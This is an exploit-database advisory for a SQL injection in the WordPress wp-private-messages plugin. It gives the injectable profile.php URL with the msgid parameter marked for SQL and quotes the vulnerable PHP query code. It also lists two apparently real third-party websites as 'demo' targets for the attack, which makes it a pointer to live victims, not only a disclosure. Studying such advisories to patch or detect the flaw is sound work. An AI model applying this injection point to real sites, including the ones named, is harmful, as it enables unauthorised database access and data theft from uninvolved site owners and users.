Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29531
HistoryJul 08, 2013 - 12:00 a.m.

Wordpress wp-private-messages Plugin Sql Injection vulnerability

2013-07-0800:00:00
vulners.com
12

The Wordpress wp-private-messages Plugin suffers from a Sql Injection vulnerability.

#################################

Iranian Exploit DataBase

Www.exploit.IrIsT.Ir

#################################

Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability

Author : Iranian Exploit DataBase

Discovered By : IeDb

Home : http://exploit.IrIsT.Ir

Software Link : http://wordpress.org/plugins/wp-private-messages/

Security Risk : High

Tested on : Linux

#################################

Exploit :

http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

Dem0 :

http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

#################################

Vuln Source C0de :

Lin 145 :

$messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");

And Lin 160 :

echo "<a href=\"?page=".dirname(plugin_basename(FILE))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(FILE))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";

#################################

Exploit Archive : http://exploit.irist.ir/exploits-148.html

#################################